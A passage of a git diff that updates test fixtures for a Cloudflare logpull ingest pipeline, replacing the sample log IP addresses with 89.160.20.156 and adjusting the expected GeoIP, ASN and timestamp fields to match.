-{"CacheCacheStatus":"unknown","CacheResponseBytes":0,"CacheResponseStatus":0,"CacheTieredFill":false,"ClientASN":15169,"ClientCountry":"us","ClientDeviceType":"desktop","ClientIP":"35.232.161.245","ClientIPClass":"noRecord","ClientRequestBytes":2577,"ClientRequestHost":"cf-analytics.com","ClientRequestMethod":"POST","ClientRequestPath":"/wp-cron.php","ClientRequestProtocol":"HTTP/1.1","ClientRequestReferer":"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000","ClientRequestURI":"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000","ClientRequestUserAgent":"WordPress/5.2.2;https://cf-analytics.com","ClientSSLCipher":"ECDHE-ECDSA-AES128-GCM-SHA256","ClientSSLProtocol":"TLSv1.2","ClientSrcPort":55028,"EdgeColoID":14,"EdgeEndTimestamp":"2019-08-02T15:29:08Z","EdgePathingOp":"chl","EdgePathingSrc":"filterBasedFirewall","EdgePathingStatus":"captchaNew","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"","EdgeResponseBytes":2848,"EdgeResponseCompressionRatio":2.64,"EdgeResponseContentType":"text/html","EdgeResponseStatus":403,"EdgeServerIP":"","EdgeStartTimestamp":"2019-08-02T15:29:08Z","FirewallMatchesActions":["simulate","challenge"],"FirewallMatchesSources":["firewallRules","firewallRules"],"FirewallMatchesRuleIDs":["094b71fea25d4860a61fa0c6fbbd8d8b","e454fd4a0ce546b3a9a462536613692c"],"OriginIP":"","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"00","RayID":"500115ec386354d8","SecurityLevel":"med","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":false,"WorkerSubrequestCount":0,"ZoneID":155978002} -{"CacheCacheStatus":"hit","CacheResponseBytes":26888,"CacheResponseStatus":200,"CacheTieredFill":true,"ClientASN":1136,"ClientCountry":"nl","ClientDeviceType":"desktop","ClientIP":"222.97.65.242","ClientIPClass":"noRecord","ClientRequestBytes":5324,"ClientRequestHost":"eqlplayground.io","ClientRequestMethod":"GET","ClientRequestPath":"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js","ClientRequestProtocol":"HTTP/1.1","ClientRequestReferer":"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))&timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))&timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)","ClientRequestURI":"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js","ClientRequestUserAgent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36","ClientSSLCipher":"NONE","ClientSSLProtocol":"none","ClientSrcPort":0,"ClientXRequestedWith":"","EdgeColoCode":"33.147.138.217","EdgeColoID":20,"EdgeEndTimestamp":1625752958875000000,"EdgePathingOp":"wl","EdgePathingSrc":"macro","EdgePathingStatus":"nr","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"eqlplayground.io","EdgeResponseBytes":24743,"EdgeResponseCompressionRatio":0,"EdgeResponseContentType":"application/javascript","EdgeResponseStatus":200,"EdgeServerIP":"1.2.3.4","EdgeStartTimestamp":1625752958812000000,"FirewallMatchesActions":[],"FirewallMatchesRuleIDs":[],"FirewallMatchesSources":[],"OriginIP":"","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"66b9d9f88b5b4c4f","RayID":"66b9d9f890ae4c4f","SecurityLevel":"off","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":true,"WorkerSubrequestCount":0,"ZoneID":393347122} -{"CacheCacheStatus":"unknown","CacheResponseBytes":0,"CacheResponseStatus":0,"CacheTieredFill":false,"ClientASN":1136,"ClientCountry":"nl","ClientDeviceType":"desktop","ClientIP":"149.175.108.201","ClientIPClass":"noRecord","ClientRequestBytes":2520,"ClientRequestHost":"eqlplayground.io","ClientRequestMethod":"GET","ClientRequestPath":"/s/eqldemo/security/account","ClientRequestProtocol":"HTTP/2","ClientRequestReferer":"","ClientRequestURI":"/s/eqldemo/security/account","ClientRequestUserAgent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36","ClientSSLCipher":"AEAD-AES128-GCM-SHA256","ClientSSLProtocol":"TLSv1.3","ClientSrcPort":61593,"ClientXRequestedWith":"","EdgeColoCode":"AMS","EdgeColoID":20,"EdgeEndTimestamp":1625754264684000000,"EdgePathingOp":"ban","EdgePathingSrc":"filterBasedFirewall","EdgePathingStatus":"nr","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"183.53.30.34","EdgeResponseBytes":2066,"EdgeResponseCompressionRatio":2.45,"EdgeResponseContentType":"text/html","EdgeResponseStatus":403,"EdgeServerIP":"","EdgeStartTimestamp":1625754264676000000,"FirewallMatchesActions":["block"],"FirewallMatchesRuleIDs":["391eb601201e4f2a81038910f2b63f6d"],"FirewallMatchesSources":["firewallRules"],"OriginIP":"7.8.9.1","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"00","RayID":"66b9f9da396e4c01","SecurityLevel":"unk","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":false,"WorkerSubrequestCount":0,"ZoneID":393347122} \ No newline at end of file +{"CacheCacheStatus":"unknown","CacheResponseBytes":0,"CacheResponseStatus":0,"CacheTieredFill":false,"ClientASN":15169,"ClientCountry":"us","ClientDeviceType":"desktop","ClientIP":"89.160.20.156","ClientIPClass":"noRecord","ClientRequestBytes":2577,"ClientRequestHost":"cf-analytics.com","ClientRequestMethod":"POST","ClientRequestPath":"/wp-cron.php","ClientRequestProtocol":"HTTP/1.1","ClientRequestReferer":"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000","ClientRequestURI":"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000","ClientRequestUserAgent":"WordPress/5.2.2;https://cf-analytics.com","ClientSSLCipher":"ECDHE-ECDSA-AES128-GCM-SHA256","ClientSSLProtocol":"TLSv1.2","ClientSrcPort":55028,"EdgeColoID":14,"EdgeEndTimestamp":"2019-08-02T15:29:08Z","EdgePathingOp":"chl","EdgePathingSrc":"filterBasedFirewall","EdgePathingStatus":"captchaNew","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"","EdgeResponseBytes":2848,"EdgeResponseCompressionRatio":2.64,"EdgeResponseContentType":"text/html","EdgeResponseStatus":403,"EdgeServerIP":"","EdgeStartTimestamp":"2019-08-02T15:29:08Z","FirewallMatchesActions":["simulate","challenge"],"FirewallMatchesSources":["firewallRules","firewallRules"],"FirewallMatchesRuleIDs":["094b71fea25d4860a61fa0c6fbbd8d8b","e454fd4a0ce546b3a9a462536613692c"],"OriginIP":"","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"00","RayID":"500115ec386354d8","SecurityLevel":"med","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":false,"WorkerSubrequestCount":0,"ZoneID":155978002} +{"CacheCacheStatus":"hit","CacheResponseBytes":26888,"CacheResponseStatus":200,"CacheTieredFill":true,"ClientASN":1136,"ClientCountry":"nl","ClientDeviceType":"desktop","ClientIP":"89.160.20.156","ClientIPClass":"noRecord","ClientRequestBytes":5324,"ClientRequestHost":"eqlplayground.io","ClientRequestMethod":"GET","ClientRequestPath":"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js","ClientRequestProtocol":"HTTP/1.1","ClientRequestReferer":"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))&timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))&timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)","ClientRequestURI":"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js","ClientRequestUserAgent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36","ClientSSLCipher":"NONE","ClientSSLProtocol":"none","ClientSrcPort":0,"ClientXRequestedWith":"","EdgeColoCode":"33.147.138.217","EdgeColoID":20,"EdgeEndTimestamp":1625752958875000000,"EdgePathingOp":"wl","EdgePathingSrc":"macro","EdgePathingStatus":"nr","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"eqlplayground.io","EdgeResponseBytes":24743,"EdgeResponseCompressionRatio":0,"EdgeResponseContentType":"application/javascript","EdgeResponseStatus":200,"EdgeServerIP":"89.160.20.156","EdgeStartTimestamp":1625752958812000000,"FirewallMatchesActions":[],"FirewallMatchesRuleIDs":[],"FirewallMatchesSources":[],"OriginIP":"","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"66b9d9f88b5b4c4f","RayID":"66b9d9f890ae4c4f","SecurityLevel":"off","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":true,"WorkerSubrequestCount":0,"ZoneID":393347122} +{"CacheCacheStatus":"unknown","CacheResponseBytes":0,"CacheResponseStatus":0,"CacheTieredFill":false,"ClientASN":1136,"ClientCountry":"nl","ClientDeviceType":"desktop","ClientIP":"89.160.20.156","ClientIPClass":"noRecord","ClientRequestBytes":2520,"ClientRequestHost":"eqlplayground.io","ClientRequestMethod":"GET","ClientRequestPath":"/s/eqldemo/security/account","ClientRequestProtocol":"HTTP/2","ClientRequestReferer":"","ClientRequestURI":"/s/eqldemo/security/account","ClientRequestUserAgent":"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36","ClientSSLCipher":"AEAD-AES128-GCM-SHA256","ClientSSLProtocol":"TLSv1.3","ClientSrcPort":61593,"ClientXRequestedWith":"","EdgeColoCode":"AMS","EdgeColoID":20,"EdgeEndTimestamp":1625754264684000000,"EdgePathingOp":"ban","EdgePathingSrc":"filterBasedFirewall","EdgePathingStatus":"nr","EdgeRateLimitAction":"","EdgeRateLimitID":0,"EdgeRequestHost":"183.53.30.34","EdgeResponseBytes":2066,"EdgeResponseCompressionRatio":2.45,"EdgeResponseContentType":"text/html","EdgeResponseStatus":403,"EdgeServerIP":"","EdgeStartTimestamp":1625754264676000000,"FirewallMatchesActions":["block"],"FirewallMatchesRuleIDs":["391eb601201e4f2a81038910f2b63f6d"],"FirewallMatchesSources":["firewallRules"],"OriginIP":"89.160.20.156","OriginResponseBytes":0,"OriginResponseHTTPExpires":"","OriginResponseHTTPLastModified":"","OriginResponseStatus":0,"OriginResponseTime":0,"OriginSSLProtocol":"unknown","ParentRayID":"00","RayID":"66b9f9da396e4c01","SecurityLevel":"unk","WAFAction":"unknown","WAFFlags":"0","WAFMatchedVar":"","WAFProfile":"unknown","WAFRuleID":"","WAFRuleMessage":"","WorkerCPUTime":0,"WorkerStatus":"unknown","WorkerSubrequest":false,"WorkerSubrequestCount":0,"ZoneID":393347122} \ No newline at end of file diff --git a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json index e98e731cfd2..5290c6b7546 100644 --- a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json @@ -9,26 +9,27 @@ }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.232.161.245", + "address": "89.160.20.156", "port": 55028, "bytes": 2577, - "ip": "35.232.161.245" + "ip": "89.160.20.156" }, "cloudflare": { "parent": { @@ -141,26 +142,27 @@ }, "client": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "35.232.161.245", + "address": "89.160.20.156", "port": 55028, "bytes": 2577, - "ip": "35.232.161.245" + "ip": "89.160.20.156" }, "tls": { "cipher": "ECDHE-ECDSA-AES128-GCM-SHA256", @@ -169,8 +171,8 @@ }, "event": { "duration": 0, - "ingested": "2021-08-10T07:34:12.277479800Z", - "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":15169,\"ClientCountry\":\"us\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"35.232.161.245\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2577,\"ClientRequestHost\":\"cf-analytics.com\",\"ClientRequestMethod\":\"POST\",\"ClientRequestPath\":\"/wp-cron.php\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestURI\":\"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestUserAgent\":\"WordPress/5.2.2;https://cf-analytics.com\",\"ClientSSLCipher\":\"ECDHE-ECDSA-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.2\",\"ClientSrcPort\":55028,\"EdgeColoID\":14,\"EdgeEndTimestamp\":\"2019-08-02T15:29:08Z\",\"EdgePathingOp\":\"chl\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"captchaNew\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"\",\"EdgeResponseBytes\":2848,\"EdgeResponseCompressionRatio\":2.64,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":\"2019-08-02T15:29:08Z\",\"FirewallMatchesActions\":[\"simulate\",\"challenge\"],\"FirewallMatchesSources\":[\"firewallRules\",\"firewallRules\"],\"FirewallMatchesRuleIDs\":[\"094b71fea25d4860a61fa0c6fbbd8d8b\",\"e454fd4a0ce546b3a9a462536613692c\"],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"500115ec386354d8\",\"SecurityLevel\":\"med\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":155978002}", + "ingested": "2021-12-09T13:36:03.427502200Z", + "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":15169,\"ClientCountry\":\"us\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2577,\"ClientRequestHost\":\"cf-analytics.com\",\"ClientRequestMethod\":\"POST\",\"ClientRequestPath\":\"/wp-cron.php\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestURI\":\"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestUserAgent\":\"WordPress/5.2.2;https://cf-analytics.com\",\"ClientSSLCipher\":\"ECDHE-ECDSA-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.2\",\"ClientSrcPort\":55028,\"EdgeColoID\":14,\"EdgeEndTimestamp\":\"2019-08-02T15:29:08Z\",\"EdgePathingOp\":\"chl\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"captchaNew\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"\",\"EdgeResponseBytes\":2848,\"EdgeResponseCompressionRatio\":2.64,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":\"2019-08-02T15:29:08Z\",\"FirewallMatchesActions\":[\"simulate\",\"challenge\"],\"FirewallMatchesSources\":[\"firewallRules\",\"firewallRules\"],\"FirewallMatchesRuleIDs\":[\"094b71fea25d4860a61fa0c6fbbd8d8b\",\"e454fd4a0ce546b3a9a462536613692c\"],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"500115ec386354d8\",\"SecurityLevel\":\"med\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":155978002}", "kind": "event", "start": "2019-08-02T15:29:08.000Z", "end": "2019-08-02T15:29:08.000Z", @@ -194,24 +196,27 @@ }, "source": { "geo": { - "continent_name": "Asia", - "country_name": "South Korea", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 126.9741, - "lat": 37.5112 - }, - "country_iso_code": "KR" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 4766, + "number": 29518, "organization": { - "name": "Korea Telecom" + "name": "Bredband2 AB" } }, - "address": "222.97.65.242", + "address": "89.160.20.156", "port": 0, "bytes": 5324, - "ip": "222.97.65.242" + "ip": "89.160.20.156" }, "cloudflare": { "parent": { @@ -296,19 +301,19 @@ "observer": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": 17.8167, + "lat": 59.2 } }, "type": "proxy", "vendor": "cloudflare", - "ip": "1.2.3.4" + "ip": "89.160.20.156" }, "@timestamp": "2021-07-08T14:02:38.812Z", "http": { @@ -325,29 +330,32 @@ }, "client": { "geo": { - "continent_name": "Asia", - "country_name": "South Korea", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 126.9741, - "lat": 37.5112 - }, - "country_iso_code": "KR" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 4766, + "number": 29518, "organization": { - "name": "Korea Telecom" + "name": "Bredband2 AB" } }, - "address": "222.97.65.242", + "address": "89.160.20.156", "port": 0, "bytes": 5324, - "ip": "222.97.65.242" + "ip": "89.160.20.156" }, "event": { "duration": 63000000, - "ingested": "2021-08-10T07:34:12.277495700Z", - "original": "{\"CacheCacheStatus\":\"hit\",\"CacheResponseBytes\":26888,\"CacheResponseStatus\":200,\"CacheTieredFill\":true,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"222.97.65.242\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":5324,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))\u0026timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))\u0026timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)\",\"ClientRequestURI\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"NONE\",\"ClientSSLProtocol\":\"none\",\"ClientSrcPort\":0,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"33.147.138.217\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625752958875000000,\"EdgePathingOp\":\"wl\",\"EdgePathingSrc\":\"macro\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"eqlplayground.io\",\"EdgeResponseBytes\":24743,\"EdgeResponseCompressionRatio\":0,\"EdgeResponseContentType\":\"application/javascript\",\"EdgeResponseStatus\":200,\"EdgeServerIP\":\"1.2.3.4\",\"EdgeStartTimestamp\":1625752958812000000,\"FirewallMatchesActions\":[],\"FirewallMatchesRuleIDs\":[],\"FirewallMatchesSources\":[],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"66b9d9f88b5b4c4f\",\"RayID\":\"66b9d9f890ae4c4f\",\"SecurityLevel\":\"off\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":true,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", + "ingested": "2021-12-09T13:36:03.427511200Z", + "original": "{\"CacheCacheStatus\":\"hit\",\"CacheResponseBytes\":26888,\"CacheResponseStatus\":200,\"CacheTieredFill\":true,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":5324,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))\u0026timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))\u0026timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)\",\"ClientRequestURI\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"NONE\",\"ClientSSLProtocol\":\"none\",\"ClientSrcPort\":0,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"33.147.138.217\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625752958875000000,\"EdgePathingOp\":\"wl\",\"EdgePathingSrc\":\"macro\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"eqlplayground.io\",\"EdgeResponseBytes\":24743,\"EdgeResponseCompressionRatio\":0,\"EdgeResponseContentType\":\"application/javascript\",\"EdgeResponseStatus\":200,\"EdgeServerIP\":\"89.160.20.156\",\"EdgeStartTimestamp\":1625752958812000000,\"FirewallMatchesActions\":[],\"FirewallMatchesRuleIDs\":[],\"FirewallMatchesSources\":[],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"66b9d9f88b5b4c4f\",\"RayID\":\"66b9d9f890ae4c4f\",\"SecurityLevel\":\"off\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":true,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", "kind": "event", "start": "2021-07-08T14:02:38.812Z", "end": "2021-07-08T14:02:38.875Z", @@ -370,37 +378,37 @@ { "server": { "bytes": 2066, - "address": "7.8.9.1", - "ip": "7.8.9.1" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "destination": { "bytes": 2066, - "address": "7.8.9.1", - "ip": "7.8.9.1" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-OR", - "city_name": "Portland", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oregon", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -122.7052, - "lat": 45.461 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 30629, + "number": 29518, "organization": { - "name": "Lewis \u0026 Clark College" + "name": "Bredband2 AB" } }, - "address": "149.175.108.201", + "address": "89.160.20.156", "port": 61593, "bytes": 2520, - "ip": "149.175.108.201" + "ip": "89.160.20.156" }, "cloudflare": { "parent": { @@ -511,27 +519,27 @@ }, "client": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-OR", - "city_name": "Portland", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Oregon", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": 